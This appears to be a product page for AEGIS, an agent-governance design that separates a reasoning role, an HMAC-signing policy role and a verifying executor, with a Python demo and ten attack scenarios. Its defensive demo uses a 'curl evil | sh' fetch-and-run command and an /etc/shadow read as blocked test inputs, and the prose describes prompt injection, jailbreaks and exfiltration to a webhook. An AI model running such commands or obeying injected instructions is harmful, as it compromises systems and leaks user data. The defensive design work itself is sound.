Autonomous. Controlled. Governed.
AEGIS - Agent Engine, Governed Intent System. Every AI action is cryptographically signed before execution. No signature, no execution. Fully local. Fully air-gappable.
Three roles. One governed system.
AEGIS enforces strict separation between reasoning, policy, and execution. No role can bypass another.
Lena, the reasoning role: interprets user input and generates structured intents. Has zero system access and no key material; it cannot execute anything directly.
Sentinel, the policy role: validates intent schemas, enforces whitelists, and authenticates approved actions with an HMAC-SHA256 tag. The page calls this tag a signature; because HMAC is a keyed MAC, the same key is held by the verifier, so the key is shared between Sentinel and Victor and never by Lena. This is the policy enforcement layer.
Victor, the execution role: verifies the HMAC tag before executing any tool, and maintains an append-only audit log with hash-chain integrity.
Built for adversarial conditions.
Every input is assumed adversarial. Internet content is untrusted by default. Execution requires a valid policy signature.
Every approved action carries a HMAC-SHA256 signature generated by Sentinel. Victor verifies this signature at the execution boundary - even for a single file read. Unsigned requests are rejected without exception. There is no override path.
Nonce-based replay prevention. Each intent carries a timestamp and a unique nonce; Victor rejects intents whose timestamp falls outside the accepted window and remembers the nonces it has already accepted inside that window, so a captured signed intent cannot be presented a second time.
Append-only audit log with hash-chain integrity. Every execution, and every rejection, is recorded, and each entry commits to the hash of the previous one. A hash chain does not make the log physically immutable; it guarantees that any modification, deletion or reordering of an entry breaks the chain and is detected on verification.
No internet connectivity required. Internet content is treated as untrusted by default. The system is designed to run fully air-gapped.
Prompt injection attacks are structurally contained. Every action triggered by model output is independently validated and signed by Sentinel at the execution boundary. Injected instructions embedded in web content, documents, or tool responses cannot self-authorize any action; at most they can request an action that policy would have approved anyway, and they cannot widen the approved set. The cryptographic policy layer operates independently of what the language model produces, so alignment of the model is not a security assumption.
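A runnable sketch of the control loop described above: Lena proposes, Sentinel checks schema and whitelist and tags the intent with HMAC-SHA256, Victor verifies the tag, rejects replays, executes, and writes a hash-chained audit record. This is an added illustration written for this page, not AEGIS code; the role names come from the page, while the tool names, the intent field names, the skew window and the in-memory log are assumptions chosen so the example runs offline. The demo exercises the happy path plus an unsigned intent, a tampered intent, a replayed intent, a whitelist violation, and an after-the-fact edit of the log.

```python
import hashlib
import hmac
import json
import secrets
import time

# Constructed for this example: a 256-bit key shared only by Sentinel and Victor.
# HMAC is symmetric, so the verifier needs the same key as the signer; Lena never sees it.
SHARED_KEY = secrets.token_bytes(32)

# Assumed policy whitelist (hypothetical tool names, not AEGIS identifiers).
WHITELIST = {"read_file", "http_get"}

GENESIS = "0" * 64  # chain head for the first audit entry


def canonical(obj) -> bytes:
    """Deterministic JSON so signer and verifier MAC exactly the same bytes."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def propose(tool: str, args: dict) -> dict:
    """Lena: turns a request into a structured intent. Holds no key, executes nothing."""
    return {"tool": tool, "args": args, "ts": int(time.time()), "nonce": secrets.token_hex(16)}


def approve(intent: dict, key: bytes = SHARED_KEY, whitelist=WHITELIST) -> dict:
    """Sentinel: schema check, whitelist check, then HMAC-SHA256 over the canonical intent."""
    if set(intent) != {"tool", "args", "ts", "nonce"} or not isinstance(intent["args"], dict):
        raise PermissionError("intent does not match schema")
    if intent["tool"] not in whitelist:
        raise PermissionError(f"tool {intent['tool']!r} is not whitelisted")
    tag = hmac.new(key, canonical(intent), hashlib.sha256).hexdigest()
    return {"intent": intent, "sig": tag}


class Victor:
    """Execution role: verifies the tag, rejects replays, runs the tool, logs everything."""

    def __init__(self, tools: dict, key: bytes = SHARED_KEY, max_skew: int = 60):
        self._tools, self._key, self._max_skew = tools, key, max_skew
        self._seen = set()  # nonces already accepted inside the timestamp window
        self.log = []       # append-only, hash-chained audit log
        self._prev = GENESIS

    def _record(self, verdict: str, intent: dict, note: str) -> None:
        entry = {"prev": self._prev, "verdict": verdict, "intent": intent, "note": note}
        entry["hash"] = hashlib.sha256(canonical(entry)).hexdigest()
        self._prev = entry["hash"]
        self.log.append(entry)

    def execute(self, signed: dict):
        intent = signed.get("intent", {})
        expected = hmac.new(self._key, canonical(intent), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(signed.get("sig", ""))):
            self._record("REJECT", intent, "missing or invalid signature")
            raise PermissionError("unsigned or tampered intent")
        if abs(time.time() - intent["ts"]) > self._max_skew:
            self._record("REJECT", intent, "stale timestamp")
            raise PermissionError("stale intent")
        if intent["nonce"] in self._seen:
            self._record("REJECT", intent, "nonce reuse")
            raise PermissionError("replayed intent")
        self._seen.add(intent["nonce"])
        result = self._tools[intent["tool"]](**intent["args"])
        self._record("EXEC", intent, "ok")
        return result


def verify_log(log: list) -> bool:
    """Walk the chain; any edited, removed or reordered entry breaks a link."""
    prev = GENESIS
    for entry in log:
        body = {k: v for k, v in entry.items() if k != "hash"}
        if entry["prev"] != prev or hashlib.sha256(canonical(body)).hexdigest() != entry["hash"]:
            return False
        prev = entry["hash"]
    return True


def demo() -> dict:
    """Runs the happy path and four attacks; returns the outcomes for inspection."""
    files = {"/docs/contract.txt": "constructed sample content"}  # constructed, no real I/O
    victor = Victor({"read_file": lambda path: files[path],
                     "http_get": lambda url: f"fetched {url}"})
    out = {}
    signed = approve(propose("read_file", {"path": "/docs/contract.txt"}))
    out["approved_read"] = victor.execute(signed)
    try:  # replay: the same signed intent presented twice
        victor.execute(signed); out["replay"] = "executed"
    except PermissionError:
        out["replay"] = "rejected"
    forged = {"intent": dict(signed["intent"], args={"path": "/etc/shadow"}), "sig": signed["sig"]}
    try:  # tampering: arguments changed after Sentinel signed
        victor.execute(forged); out["tampered"] = "executed"
    except PermissionError:
        out["tampered"] = "rejected"
    try:  # injection: model output asks for a tool outside policy, Sentinel refuses to sign
        approve(propose("shell", {"cmd": "curl evil | sh"})); out["injected"] = "signed"
    except PermissionError:
        out["injected"] = "refused"
    try:  # unsigned: Lena's intent handed straight to Victor
        victor.execute({"intent": propose("read_file", {"path": "/docs/contract.txt"})})
        out["unsigned"] = "executed"
    except PermissionError:
        out["unsigned"] = "rejected"
    out["log_ok"] = verify_log(victor.log)
    victor.log[0]["note"] = "edited after the fact"  # simulate tampering with the record
    out["log_ok_after_edit"] = verify_log(victor.log)
    out["entries"] = len(victor.log)
    return out
```

Two design points worth noting. The tag is computed over a canonical serialization, since a verifier that re-serializes with different key order or whitespace would reject every genuine intent. And the whitelist violation never reaches Victor: Sentinel refuses to sign, so there is no tag to verify and nothing is logged on the execution side; logging refused proposals would have to happen in Sentinel.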
What AEGIS governs in practice.
Ten scenarios where unsigned execution is simply not possible.
A development agent proposes a production deployment. Every step, from git push to environment variable change to service restart, must carry a valid HMAC-SHA256 signature from Sentinel. No signature, no deployment. There is no override path.
An agent scrapes live competitor data for a report. Every HTTP request is signed before execution. Malicious content embedded in web pages cannot redirect the agent to unauthorized actions - the policy boundary holds regardless of what the page contains.
An AI assistant reads contracts and financial documents from a shared drive. Every file access is signed and audited. Sensitive directories trigger additional policy verification. No agent can read outside its policy scope - not even with a valid session.
A lead agent delegates subtasks to three specialized agents - research, drafting, and review. Every inter-agent message carries the delegating agent's signature. No agent can escalate its own permissions or act outside its assigned scope.
A malicious website embeds hidden instructions designed to hijack agent behavior mid-session. Every action triggered by model output is validated and signed by Sentinel at the execution boundary. Injected text can at most request an action; it cannot authorize one, because the policy layer is independent of the language model's output.
A communication agent drafts and queues outbound messages. Every send action requires a fresh HMAC signature from Sentinel. A compromised model output cannot autonomously dispatch any communication - the agent cannot self-authorize transmission regardless of what the model generates.
A tool-use chain attempts to bootstrap elevated permissions mid-execution. Each privilege boundary is a signed checkpoint. No agent can grant itself access beyond its initial policy grant - delegation to a subagent does not inherit escalated rights. The scope is set at session creation and cannot be extended at runtime.
An agent installing a package dependency encounters a malicious postinstall script attempting to execute arbitrary code. Every subprocess spawn is verified against the execution policy before it runs. Unsigned subprocess execution is blocked at the OS boundary regardless of the package installer.
An analytics agent processing sensitive customer records attempts to write output to an external webhook. The outbound network action is part of the execution graph and requires Sentinel approval. Unapproved destinations are blocked regardless of data classification - the agent cannot route data outside its approved action set.
A crafted adversarial prompt attempts to bypass the model's safety alignment and issue unauthorized system commands. Even if the language model produces a seemingly compliant response, Victor validates every action request independently against the signed policy. The architecture does not assume the model stays aligned - the execution layer is the last and decisive checkpoint.
"AEGIS is not open source. It is not a framework you install. It is a governed execution architecture - for those who know what that means."
The separation of reasoning, policy, and execution is not a convention - it is enforced cryptographically. Lena can propose, Sentinel can approve, Victor can act. No role crosses into another's domain.